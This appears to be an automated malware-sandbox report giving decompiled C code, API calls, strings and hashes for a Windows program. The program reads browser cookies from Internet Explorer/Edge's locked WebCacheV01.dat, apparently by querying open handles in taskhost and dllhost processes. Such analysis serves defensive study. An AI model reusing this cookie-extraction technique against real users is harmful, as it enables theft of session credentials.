SizeofResource.KERNEL32(?,00000000), ref: 0040DA1A
LoadResource.KERNEL32(?,00000000), ref: 0040DA2A
LockResource.KERNEL32(00000000), ref: 0040DA35

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 3f2537d69a83dbad711086520e7fd7dadb7db9e2dcff2647f4325042d9b9d9c7
Instruction ID: 1e085ebe6cf1454c0a13dd2dc3297af32645bfe8ec8fc95f9f4fc45ffd099028
Opcode Fuzzy Hash: 3f2537d69a83dbad711086520e7fd7dadb7db9e2dcff2647f4325042d9b9d9c7
Instruction Fuzzy Hash: 9B018032B04215ABCB299FE5DD4995BBFAAFB853907048036AC09EA360D770CD14CAD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040C516, Relevance: 1.5, APIs: 1, Instructions: 11
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C516(signed int* __eax, void* _a4, long _a8, long* _a12) {
				signed int _t5;
				long _t7;

				_t5 =  *__eax;
				if(_t5 == 0) {
					return _t5 | 0xffffffff;
				}
				_t7 = NtQuerySystemInformation(0x10, _a4, _a8, _a12); // executed
				return _t7;
			}

0x0040c516
0x0040c51a
0x00000000
0x0040c52e
0x0040c52a
0x00000000

APIs

NtQuerySystemInformation.NTDLL(00000010,?,?,?,0040C5A6,00000000,00001000,00000000,?,?,00000000), ref: 0040C52A

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 738e521c8b0e2f7fb8dbff4b4999eafe421484fd9be088d8b3f21b89483e91da
Instruction ID: c4ee8ba0ae0e5c888482442c657d74a2bffdce45b5391c025a143593a4db9a10
Opcode Fuzzy Hash: 738e521c8b0e2f7fb8dbff4b4999eafe421484fd9be088d8b3f21b89483e91da
Instruction Fuzzy Hash: 16C0123D108200FEDA014BA08C40E0FB791AF89770F14CB19B174900E0C2B1D020A722

Uniqueness

Uniqueness Score: -1.00%

Function 0040BE98, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040BE98(void* __ecx, void* __edx, void* __eflags, intOrPtr _a12, char _a24, struct HWND__* _a28, struct HWND__* _a32, intOrPtr _a36, struct HWND__* _a40, struct tagMSG _a44, char _a72, char _a76, struct HWND__* _a592, struct HACCEL__* _a616, intOrPtr _a664, intOrPtr _a1792, char* _a1800, struct HWND__* _a1820) {
				char _v4;
				char _v8;
				struct HWND__* _v12;
				void* __edi;
				void* __esi;
				void* _t42;
				struct HWND__* _t53;
				void* _t60;
				struct HWND__* _t69;
				struct HWND__* _t71;
				struct HWND__* _t76;
				int _t82;
				int _t84;
				struct HWND__* _t85;
				void* _t93;
				struct HWND__* _t107;
				struct HWND__* _t108;

				_t93 = __edx;
				_t92 = __ecx;
				E0040E340(0x27a4, __ecx);
				_t42 = E00402754(_t92);
				if(_t42 != 0) {
					E0040DA9D();
					SetErrorMode(0x8001); // executed
					 *0x412b10 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040DA82, 0); // executed
					E0040621C( &_v4);
					_push( &_a76);
					_a36 = 0x20;
					_a28 = 0;
					_a40 = 0;
					_a32 = 0;
					_a44.hwnd = 0;
					E0040BB15(__eflags);
					_a1800 =  &_v8;
					E004064A1(_t92, __eflags,  &_v8, _a12);
					_t53 = E004065C4(_a1792, L"/savelangfile");
					__eflags = _t53;
					if(_t53 < 0) {
						E00407259(); // executed
						__eflags = E004065C4(_a1800, L"/deleteregkey");
						if(__eflags < 0) {
							__eflags =  *((intOrPtr*)(_a1800 + 0x30)) - 1;
							if(__eflags <= 0) {
								L7:
								E0040BA94( &_a72);
								__eflags = _a664 - 3;
								if(_a664 != 3) {
									_push(5);
								} else {
									_push(3);
								}
								ShowWindow(_a592, ??);
								UpdateWindow(_a592);
								_a616 = LoadAcceleratorsW(GetModuleHandleW(0), 0x67);
								__eflags = GetMessageW( &_a44, 0, 0, 0);
								while(__eflags != 0) {
									_t69 =  *0x412c2c; // 0x0
									__eflags = _t69;
									_t107 = _t69;
									if(_t69 == 0) {
										L14:
										_t71 = TranslateAcceleratorW(_a592, _a616,  &_a44);
										__eflags = _t71;
										if(_t71 == 0) {
											goto L15;
										}
									} else {
										_t85 = GetForegroundWindow();
										__eflags = _t107 - _t85;
										if(_t107 == _t85) {
											L15:
											_t108 =  *0x412c2c; // 0x0
											_v12 = _a1820;
											_t76 = IsDialogMessageW(_a592,  &_a44);
											__eflags = _t76;
											if(_t76 == 0) {
												__eflags = _t108;
												if(_t108 == 0) {
													L18:
													__eflags = _v12;
													if(_v12 == 0) {
														L20:
														TranslateMessage( &_a44);
														DispatchMessageW( &_a44);
													} else {
														_t82 = IsDialogMessageW(_v12,  &_a44);
														__eflags = _t82;
														if(_t82 == 0) {
															goto L20;
														}
													}
												} else {
													_t84 = IsDialogMessageW(_t108,  &_a44);
													__eflags = _t84;
													if(_t84 == 0) {
														goto L18;
													}
												}
											}
										} else {
											goto L14;
										}
									}
									__eflags = GetMessageW( &_a44, 0, 0, 0);
								}
							} else {
								__eflags = E0040BD40( &_a72, _t93, __eflags);
								if(__eflags == 0) {
									goto L7;
								}
							}
						}
					} else {
						 *0x4131d0 = 0x412374;
						E004073F7(_t92);
					}
					E0040BC51( &_a72, __eflags);
					E0040623E( &_v8);
					E00403F55( &_a24);
					E0040623E( &_v8);
					_t60 = 0;
					__eflags = 0;
				} else {
					_t60 = _t42 + 1;
				}
				return _t60;
			}

0x0040be98
0x0040be98
0x0040bea3
0x0040beab
0x0040beb2
0x0040beba
0x0040bec4
0x0040bed9
0x0040bee6
0x0040bef0
0x0040bef9
0x0040befa
0x0040bf02
0x0040bf06
0x0040bf0a
0x0040bf0e
0x0040bf12
0x0040bf1f
0x0040bf26
0x0040bf37
0x0040bf3c
0x0040bf3e
0x0040bf54
0x0040bf6a
0x0040bf6c
0x0040bf79
0x0040bf7d
0x0040bf90
0x0040bf94
0x0040bf99
0x0040bfa1
0x0040bfa7
0x0040bfa3
0x0040bfa3
0x0040bfa3
0x0040bfb0
0x0040bfbd
0x0040bfd1
0x0040bfe4
0x0040bfe6
0x0040bff2
0x0040bff7
0x0040bff9
0x0040bffb
0x0040c007
0x0040c01a
0x0040c020
0x0040c022
0x00000000
0x00000000
0x0040bffd
0x0040bffd
0x0040c003
0x0040c005
0x0040c024
0x0040c02b
0x0040c031
0x0040c041
0x0040c043
0x0040c045
0x0040c047
0x0040c049
0x0040c057
0x0040c057
0x0040c05b
0x0040c06c
0x0040c071
0x0040c07c
0x0040c05d
0x0040c066
0x0040c068
0x0040c06a
0x00000000
0x00000000
0x0040c06a
0x0040c04b
0x0040c051
0x0040c053
0x0040c055
0x00000000
0x00000000
0x0040c055
0x0040c049
0x00000000
0x00000000
0x00000000
0x0040c005
0x0040c090
0x0040c090
0x0040bf7f
0x0040bf88
0x0040bf8a
0x00000000
0x00000000
0x0040bf8a
0x0040bf7d
0x0040bf40
0x0040bf40
0x0040bf4a
0x0040bf4a
0x0040c09c
0x0040c0a5
0x0040c0ae
0x0040c0b7
0x0040c0bc
0x0040c0bc
0x0040beb4
0x0040beb4
0x0040beb4
0x0040c0c4

APIs

Part of subcall function 00402754: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402773
Part of subcall function 00402754: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00402785
Part of subcall function 00402754: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402799
Part of subcall function 00402754: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004027C4

SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040BEC4
GetModuleHandleW.KERNEL32(00000000,0040DA82,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040BEE3
EnumResourceTypesW.KERNEL32 ref: 0040BEE6

Strings

/savelangfile, xrefs: 0040BF32
, xrefs: 0040BEFA
/deleteregkey, xrefs: 0040BF60

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
String ID: $/deleteregkey$/savelangfile
API String ID: 2744995895-28296030
Opcode ID: 16670ade8d057f9152663538c6d4224641cd9f1f9fcff8b2ffb5104e2a31c215
Instruction ID: 7c11083c69c625fd9a2f21e20e1dcd1dda6225a88cbd83bdad8d2a1ddbeb11aa
Opcode Fuzzy Hash: 16670ade8d057f9152663538c6d4224641cd9f1f9fcff8b2ffb5104e2a31c215
Instruction Fuzzy Hash: E2516C71508345EBD720AFA1DD8895FB7E8FB84304F40493EFA85E3191DB39E8088B5A

Uniqueness

Uniqueness Score: -1.00%

Function 00403BAF, Relevance: 19.7, APIs: 4, Strings: 9, Instructions: 192
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00403BAF(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				int _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				int _v60;
				int _v64;
				int _v68;
				char _v72;
				intOrPtr _v76;
				int _v80;
				int _v84;
				int _v88;
				int _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed int _v112;
				signed int _v116;
				void _v124;
				void _v132;
				void _v136;
				char _v140;
				char _v912;
				char _v936;
				char _v1496;
				char _v1500;
				void* __edi;
				void* __esi;
				void* _t89;
				signed int _t109;
				signed int _t114;
				intOrPtr _t119;
				intOrPtr _t120;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr* _t137;
				intOrPtr* _t139;
				void* _t142;
				intOrPtr _t147;
				intOrPtr _t148;
				void* _t151;
				void* _t163;

				_t151 = __edx;
				_v76 = 0x100;
				_v56 = 0x100;
				_v80 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_v60 = 0;
				_v72 = 0;
				_v68 = 0;
				_v64 = 0;
				E00403E49( &_v1500);
				_t89 = E004048DA(_t142, _t151,  &_v1500, _a8, _a4 + 4); // executed
				_t164 = _t89;
				if(_t89 == 0) {
					L30:
					E00403E8F( &_v912);
					E00403F55( &_v936);
					E00406710( &_v1496);
					E00406355( &_v72);
					return E00406355( &_v92);
				} else {
					_v12 = 0x20;
					_v20 = 0;
					_v8 = 0;
					_v16 = 0;
					do {
						if(E00404BE4(_t164,  &_v1500,  &_v20) != 0) {
							_t161 =  &_v20;
							_v24 = E004039C1( &_v20, L"Name");
							_v28 = E004039C1( &_v20, L"Value");
							_v32 = E004039C1( &_v20, L"Path");
							_v36 = E004039C1( &_v20, L"RDomain");
							_v48 = E004039C1(_t161, L"Expires");
							_v52 = E004039C1(_t161, L"LastModified");
							_v44 = E004039C1(_t161, L"EntryId");
							_v40 = E004039C1(_t161, L"Flags");
							if(_v24 != 0 && _v28 != 0 && _v32 != 0 && _v36 != 0) {
								_t109 = memset( &_v136, 0, 0x2c);
								_t163 = _t163 + 0xc;
								E0040637A(_t109 | 0xffffffff,  &_v92, 0x40f454);
								E0040518A( &_v92, _v36);
								_t114 = _v92;
								_v112 = 0x40f454;
								if(_t114 != 0) {
									_v112 = _t114;
								}
								E0040637A(_t114 | 0xffffffff,  &_v72, 0x40f454);
								E0040518A( &_v72, _v32);
								_t119 = _v72;
								_v116 = 0x40f454;
								if(_t119 != 0) {
									_v116 = _t119;
								}
								_t120 = _v24;
								_t147 =  *((intOrPtr*)(_t120 + 0x328));
								if(_t147 <= 0) {
									_v108 = 0x40f924;
								} else {
									_t139 = _t120 + 0x220;
									 *((char*)(_t147 +  *_t139 - 1)) = 0;
									_v108 =  *_t139;
								}
								_t121 = _v28;
								_t148 =  *((intOrPtr*)(_t121 + 0x328));
								if(_t148 <= 0) {
									_v104 = 0x40f924;
								} else {
									_t137 = _t121 + 0x220;
									 *((char*)( *_t137 + _t148 - 1)) = 0;
									_v104 =  *_t137;
								}
								_t122 = _v48;
								if(_t122 != 0) {
									memcpy( &_v132, _t122 + 0x220, 8);
									_t163 = _t163 + 0xc;
								}
								_t123 = _v52;
								if(_t123 != 0) {
									memcpy( &_v124, _t123 + 0x220, 8);
									_t163 = _t163 + 0xc;
								}
								_t124 = _v40;
								if(_t124 != 0) {
									_v96 =  *((intOrPtr*)(_t124 + 0x220));
								}
								_t125 = _v44;
								if(_t125 == 0) {
									_v140 = 0;
									_v136 = 0;
								} else {
									_v140 =  *((intOrPtr*)(_t125 + 0x220));
									_v136 =  *((intOrPtr*)(_t125 + 0x224));
								}
								_v100 = _a8;
								 *((intOrPtr*)( *_a4))( &_v140);
							}
						}
					} while (E0040489D( &_v1500) != 0);
					if(_v20 != 0) {
						free(_v20);
					}
					goto L30;
				}
			}

0x00403baf
0x00403bc1
0x00403bc4
0x00403bce
0x00403bd1
0x00403bd4
0x00403bd7
0x00403bda
0x00403bdd
0x00403be0
0x00403be3
0x00403be6
0x00403bfc
0x00403c01
0x00403c03
0x00403e11
0x00403e17
0x00403e22
0x00403e2d
0x00403e35
0x00403e46
0x00403c09
0x00403c09
0x00403c10
0x00403c13
0x00403c16
0x00403c19
0x00403c2b
0x00403c36
0x00403c43
0x00403c50
0x00403c5d
0x00403c6a
0x00403c77
0x00403c84
0x00403c91
0x00403c9c
0x00403c9f
0x00403cca
0x00403ccf
0x00403cde
0x00403ce8
0x00403ced
0x00403cf2
0x00403cf5
0x00403cf7
0x00403cf7
0x00403d01
0x00403d0b
0x00403d10
0x00403d15
0x00403d18
0x00403d1a
0x00403d1a
0x00403d1d
0x00403d20
0x00403d28
0x00403d3c
0x00403d2a
0x00403d2a
0x00403d31
0x00403d37
0x00403d37
0x00403d43
0x00403d46
0x00403d4e
0x00403d62
0x00403d50
0x00403d50
0x00403d57
0x00403d5d
0x00403d5d
0x00403d69
0x00403d6e
0x00403d7c
0x00403d81
0x00403d81
0x00403d84
0x00403d89
0x00403d97
0x00403d9c
0x00403d9c
0x00403d9f
0x00403da4
0x00403dac
0x00403dac
0x00403daf
0x00403db4
0x00403dd0
0x00403dd6
0x00403db6
0x00403dc2
0x00403dc8
0x00403dc8
0x00403de8
0x00403dee
0x00403dee
0x00403c9f
0x00403dfb
0x00403e06
0x00403e0b
0x00403e10
0x00000000
0x00403e06

APIs

Part of subcall function 004048DA: _wcsicmp.MSVCRT ref: 0040490F

Part of subcall function 00404BE4: memset.MSVCRT ref: 00404CE0

free.MSVCRT(?,?,?,?,?,?), ref: 00403E0B

Part of subcall function 004039C1: _wcsicmp.MSVCRT ref: 004039DA

memset.MSVCRT ref: 00403CCA

Part of subcall function 0040637A: wcslen.MSVCRT ref: 0040638D
Part of subcall function 0040637A: memcpy.MSVCRT ref: 004063AC

memcpy.MSVCRT ref: 00403D7C
memcpy.MSVCRT ref: 00403D97

Strings

RDomain, xrefs: 00403C58
Value, xrefs: 00403C3E
, xrefs: 00403C09
Name, xrefs: 00403C31
EntryId, xrefs: 00403C7F
Flags, xrefs: 00403C8C
Expires, xrefs: 00403C65
Path, xrefs: 00403C4B
LastModified, xrefs: 00403C72

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$_wcsicmpmemset$freewcslen
String ID: $EntryId$Expires$Flags$LastModified$Name$Path$RDomain$Value
API String ID: 4182952938-1692241855
Opcode ID: a0a7945c210b4147cc27cadda54a762df6b682028906b78dd32beb38a9cdaeb6
Instruction ID: d25acf1ba17ca876296ee2e242e904372f251ddc37699a211d4a96aadb20766e
Opcode Fuzzy Hash: a0a7945c210b4147cc27cadda54a762df6b682028906b78dd32beb38a9cdaeb6
Instruction Fuzzy Hash: D071E9B1D002199BCF20EFA5D881ADEBBB8BF04305F54447BE505BB281DB789A458F58

Uniqueness

Uniqueness Score: -1.00%

Function 004039F6, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 127
fileCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004039F6(void* __eax) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				char _v52;
				void _v578;
				int _v580;
				void _v1106;
				long _v1108;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t44;
				signed short _t48;
				int _t55;
				void* _t60;
				signed int _t63;
				void* _t77;
				void* _t94;
				signed short* _t100;
				void* _t102;

				_t102 = __eax;
				_t44 =  *((intOrPtr*)(__eax + 0x63c));
				_t100 = __eax + 0x430;
				_v8 = 0;
				 *_t100 = 0;
				if(_t44 != 1) {
					__eflags = _t44 - 2;
					if(__eflags == 0) {
						_t48 = E00403FDE(__eax + 4, __eflags, __eax + 0x640);
						__eflags = _t48;
						if(_t48 == 0) {
							_v8 =  *((intOrPtr*)(_t102 + 0x418));
						}
					}
					L15:
					return _v8;
				}
				_v580 = 0;
				memset( &_v578, 0, 0x208);
				_v1108 = _v1108 & 0x00000000;
				memset( &_v1106, 0, 0x208);
				E0040DACC( &_v1108, 0); // executed
				_t55 = wcslen(L"Microsoft\\Windows\\WebCache\\WebCacheV01.dat");
				_t12 = wcslen( &_v1108) + 1; // 0x1
				if(_t55 + _t12 >= 0x104) {
					_t15 =  &_v580;
					 *_t15 = _v580 & 0x00000000;
					__eflags =  *_t15;
				} else {
					E00405930( &_v580,  &_v1108, L"Microsoft\\Windows\\WebCache\\WebCacheV01.dat");
				}
				_t60 = E004057D1( &_v580);
				_t109 = _t60;
				_pop(_t94);
				if(_t60 == 0) {
					_v8 = 0xfffffffd;
				} else {
					_t90 = _t102 + 4;
					_t63 = E00403FDE(_t102 + 4, _t109,  &_v580);
					_t110 = _t63;
					if(_t63 == 0) {
						_v20 = _v20 & _t63;
						_v16 = _v16 & _t63;
						_v12 = 0x1388;
						E00406264(E0040621C( &_v52), _t94, L"dllhost.exe");
						E00406264( &_v52, _t94, L"taskhost.exe");
						E00406264( &_v52, _t94, L"taskhostex.exe");
						E00406264( &_v52, _t94, L"taskhostw.exe");
						E0040567E(_t100, L"ecv"); // executed
						_t77 = E0040C5E9(_t110,  &_v20,  &_v52,  &_v580, _t100); // executed
						_t111 = _t77;
						_push(_t100);
						if(_t77 == 0) {
							_v8 = 0xfffffffe;
							DeleteFileW(??);
							 *_t100 =  *_t100 & 0x00000000;
							__eflags =  *_t100;
						} else {
							if(E00403FDE(_t90, _t111) == 0) {
								_v8 =  *((intOrPtr*)(_t102 + 0x418));
							}
						}
						E0040623E( &_v52);
						E00406710( &_v20);
					}
				}
			}

0x00403a01
0x00403a03
0x00403a0f
0x00403a15
0x00403a18
0x00403a1b
0x00403b86
0x00403b89
0x00403b95
0x00403b9a
0x00403b9c
0x00403ba4
0x00403ba4
0x00403b9c
0x00403ba7
0x00403bae
0x00403bae
0x00403a2f
0x00403a36
0x00403a3b
0x00403a50
0x00403a5e
0x00403a68
0x00403a7c
0x00403a86
0x00403aa3
0x00403aa3
0x00403aa3
0x00403a88
0x00403a9a
0x00403aa0
0x00403ab2
0x00403ab7
0x00403ab9
0x00403aba
0x00403b7d
0x00403ac0
0x00403ac6
0x00403acc
0x00403ad1
0x00403ad3
0x00403ad9
0x00403adc
0x00403ae2
0x00403af3
0x00403b00
0x00403b0d
0x00403b1a
0x00403b24
0x00403b3a
0x00403b3f
0x00403b41
0x00403b42
0x00403b5a
0x00403b61
0x00403b67
0x00403b67
0x00403b44
0x00403b4d
0x00403b55
0x00403b55
0x00403b4d
0x00403b6e
0x00403b76
0x00403b76
0x00403ad3

APIs

memset.MSVCRT ref: 00403A36
memset.MSVCRT ref: 00403A50

Part of subcall function 0040DACC: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?), ref: 0040DAEF

wcslen.MSVCRT ref: 00403A68
wcslen.MSVCRT ref: 00403A77

Part of subcall function 00405930: wcscpy.MSVCRT ref: 00405938
Part of subcall function 00405930: wcscat.MSVCRT ref: 00405947

DeleteFileW.KERNEL32(?,?,?,00000000,?,taskhostw.exe,taskhostex.exe,taskhost.exe,dllhost.exe,00000000), ref: 00403B61

Strings

taskhostw.exe, xrefs: 00403B12
dllhost.exe, xrefs: 00403AEE
taskhostex.exe, xrefs: 00403B05
taskhost.exe, xrefs: 00403AF8
ecv, xrefs: 00403B1F
Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 00403A63, 00403A8E

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memsetwcslen$DeleteFileFolderPathSpecialwcscatwcscpy
String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$dllhost.exe$ecv$taskhost.exe$taskhostex.exe$taskhostw.exe
API String ID: 2175868439-3212516833
Opcode ID: 24fc45b670e89c90fc9f8dccd731adadcc036b3d9691952aae2eeb5ea30e9faf
Instruction ID: a022d5ce61393d47798dcb13383e44886591ba6ad6dcc354a4b6cd20eba80d87
Opcode Fuzzy Hash: 24fc45b670e89c90fc9f8dccd731adadcc036b3d9691952aae2eeb5ea30e9faf
Instruction Fuzzy Hash: 4B41677291061996DB10EFA5DC85ADE73BCEF04319F10457FE505F21C2EB38AB488B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E0A4, Relevance: 18.1, APIs: 12, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 32%

			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t35;
				intOrPtr* _t37;
				intOrPtr* _t38;
				void* _t41;
				intOrPtr _t43;
				intOrPtr _t47;
				signed int _t49;
				signed int _t51;
				int _t53;
				int _t54;
				signed int _t56;
				signed int _t57;
				signed int _t58;
				int _t61;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr* _t66;
				void* _t67;
				signed int _t71;
				int _t72;
				void* _t73;
				intOrPtr _t81;

				_t67 = __edx;
				_push(0x70);
				_push(0x40f3f0);
				E0040E2B8(__ebx, __edi, __esi);
				_t35 = GetModuleHandleA(0);
				if(_t35->i != 0x5a4d) {
					L4:
					 *(_t73 - 0x1c) = 0;
				} else {
					_t66 =  *((intOrPtr*)(_t35 + 0x3c)) + _t35;
					if( *_t66 != 0x4550) {
						goto L4;
					} else {
						_t57 =  *(_t66 + 0x18) & 0x0000ffff;
						if(_t57 == 0x10b) {
							__eflags =  *((intOrPtr*)(_t66 + 0x74)) - 0xe;
							if( *((intOrPtr*)(_t66 + 0x74)) <= 0xe) {
								goto L4;
							} else {
								_t58 = 0;
								__eflags =  *(_t66 + 0xe8);
								goto L9;
							}
						} else {
							if(_t57 == 0x20b) {
								__eflags =  *((intOrPtr*)(_t66 + 0x84)) - 0xe;
								if( *((intOrPtr*)(_t66 + 0x84)) <= 0xe) {
									goto L4;
								} else {
									_t58 = 0;
									__eflags =  *(_t66 + 0xf8);
									L9:
									_t9 = __eflags != 0;
									__eflags = _t9;
									 *(_t73 - 0x1c) = _t58 & 0xffffff00 | _t9;
								}
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t73 - 4) = 0;
				_t61 = 2;
				__set_app_type(_t61);
				 *0x413700 =  *0x413700 | 0xffffffff;
				 *0x413704 =  *0x413704 | 0xffffffff;
				_t37 = __p__fmode();
				_t63 =  *0x41238c; // 0x0
				 *_t37 = _t63;
				_t38 = __p__commode();
				_t64 =  *0x412388; // 0x0
				 *_t38 = _t64;
				 *0x4136fc =  *_adjust_fdiv;
				_t41 = E0040E2B2();
				_t81 =  *0x412000; // 0x1
				if(_t81 == 0) {
					__setusermatherr(E0040E2B2);
					_pop(_t64);
				}
				E0040E2A0(_t41);
				L0040E29A();
				_t43 =  *0x412384; // 0x0
				 *((intOrPtr*)(_t73 - 0x20)) = _t43;
				_t47 = _t73 - 0x2c;
				__imp____wgetmainargs(_t47, _t73 - 0x28, _t73 - 0x24,  *0x412380, _t73 - 0x20, 0x40f3c0, 0x40f3c4); // executed
				 *((intOrPtr*)(_t73 - 0x30)) = _t47;
				_push(0x40f3bc);
				_push(0x40f394); // executed
				L0040E29A(); // executed
				_t71 =  *__imp___wcmdln;
				if(_t71 != 0) {
					 *(_t73 - 0x34) = _t71;
					__eflags =  *_t71 - 0x22;
					if( *_t71 != 0x22) {
						while(1) {
							__eflags =  *_t71 - 0x20;
							if( *_t71 <= 0x20) {
								goto L19;
							}
							_t71 = _t71 + _t61;
							 *(_t73 - 0x34) = _t71;
						}
					} else {
						while(1) {
							_t71 = _t71 + _t61;
							 *(_t73 - 0x34) = _t71;
							_t56 =  *_t71;
							__eflags = _t56;
							if(_t56 == 0) {
								break;
							}
							__eflags = _t56 - 0x22;
							if(_t56 != 0x22) {
								continue;
							}
							break;
						}
						__eflags =  *_t71 - 0x22;
						if( *_t71 == 0x22) {
							L18:
							_t71 = _t71 + _t61;
							__eflags = _t71;
							 *(_t73 - 0x34) = _t71;
						}
					}
					L19:
					_t49 =  *_t71;
					__eflags = _t49;
					if(_t49 != 0) {
						__eflags = _t49 - 0x20;
						if(_t49 <= 0x20) {
							goto L18;
						}
					}
					 *(_t73 - 0x4c) = 0;
					GetStartupInfoW(_t73 - 0x78);
					__eflags =  *(_t73 - 0x4c) & 0x00000001;
					if(__eflags == 0) {
						_t51 = 0xa;
					} else {
						_t51 =  *(_t73 - 0x48) & 0x0000ffff;
					}
					_t53 = E0040BE98(_t64, _t67, __eflags, GetModuleHandleA(0), 0, _t71, _t51); // executed
					_t72 = _t53;
					 *(_t73 - 0x7c) = _t72;
					__eflags =  *(_t73 - 0x1c);
					if( *(_t73 - 0x1c) == 0) {
						exit(_t72); // executed
					}
					__imp___cexit();
					_t32 = _t73 - 4;
					 *_t32 =  *(_t73 - 4) | 0xffffffff;
					__eflags =  *_t32;
					_t54 = _t72;
				} else {
					 *(_t73 - 4) =  *(_t73 - 4) | 0xffffffff;
					_t54 = 0xff;
				}
				return E0040E2F1(_t54);
			}

0x0040e0a4
0x0040e0a4
0x0040e0a6
0x0040e0ab
0x0040e0b3
0x0040e0be
0x0040e0df
0x0040e0df
0x0040e0c0
0x0040e0c3
0x0040e0cb
0x00000000
0x0040e0cd
0x0040e0cd
0x0040e0d6
0x0040e0f7
0x0040e0fb
0x00000000
0x0040e0fd
0x0040e0fd
0x0040e0ff
0x00000000
0x0040e0ff
0x0040e0d8
0x0040e0dd
0x0040e0e4
0x0040e0eb
0x00000000
0x0040e0ed
0x0040e0ed
0x0040e0ef
0x0040e105
0x0040e105
0x0040e105
0x0040e108
0x0040e108
0x00000000
0x00000000
0x00000000
0x0040e0dd
0x0040e0d6
0x0040e0cb
0x0040e10b
0x0040e110
0x0040e112
0x0040e119
0x0040e120
0x0040e127
0x0040e12d
0x0040e133
0x0040e135
0x0040e13b
0x0040e141
0x0040e14a
0x0040e14f
0x0040e154
0x0040e15a
0x0040e161
0x0040e167
0x0040e167
0x0040e168
0x0040e177
0x0040e17c
0x0040e181
0x0040e196
0x0040e19a
0x0040e1a0
0x0040e1a3
0x0040e1a8
0x0040e1ad
0x0040e1ba
0x0040e1be
0x0040e1ce
0x0040e1d1
0x0040e1d5
0x0040e21c
0x0040e21c
0x0040e220
0x00000000
0x00000000
0x0040e222
0x0040e224
0x0040e224
0x0040e1d7
0x0040e1d7
0x0040e1d7
0x0040e1d9
0x0040e1dc
0x0040e1df
0x0040e1e2
0x00000000
0x00000000
0x0040e1e4
0x0040e1e8
0x00000000
0x00000000
0x00000000
0x0040e1e8
0x0040e1ea
